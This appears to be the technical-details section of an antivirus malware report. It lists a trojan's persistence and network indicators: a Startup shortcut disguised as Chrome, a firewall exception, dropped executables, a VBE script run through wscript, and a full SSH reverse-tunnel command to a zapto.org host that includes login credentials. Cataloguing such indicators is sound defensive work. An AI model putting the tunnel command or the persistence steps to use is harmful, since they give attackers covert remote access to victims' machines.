Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Chrome.lnk
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Real.Time.Protection\tdtrtrd.exe' = 'C:\Real.Time.Protection\tdtrtrd.exe:*:Enabled:tdtrtrd'
- 'C:\Real.Time.Protection\dhgdff.exe' -ssh -R 7526:127.0.1.3:3103 httpsnew1.zapto.org -l usersox -pw 2n16122N
- 'C:\Real.Time.Protection\tdtrtrd.exe'
- '<SYSTEM32>\wscript.exe' "C:\Real.Time.Protection\chrome.vbe"
- C:\Real.Time.Protection\dhgdff.exe
- C:\Real.Time.Protection\tdtrtrd.exe
- <LS_APPDATA>\PUTTY.RND
- C:\Real.Time.Protection\chrome.vbe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- C:\Real.Time.Protection\000000.cfg
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'ht####ew1.zapto.org':22
- DNS ASK ht####ew1.zapto.org
- ClassName: 'Shell_TrayWnd' WindowName: ''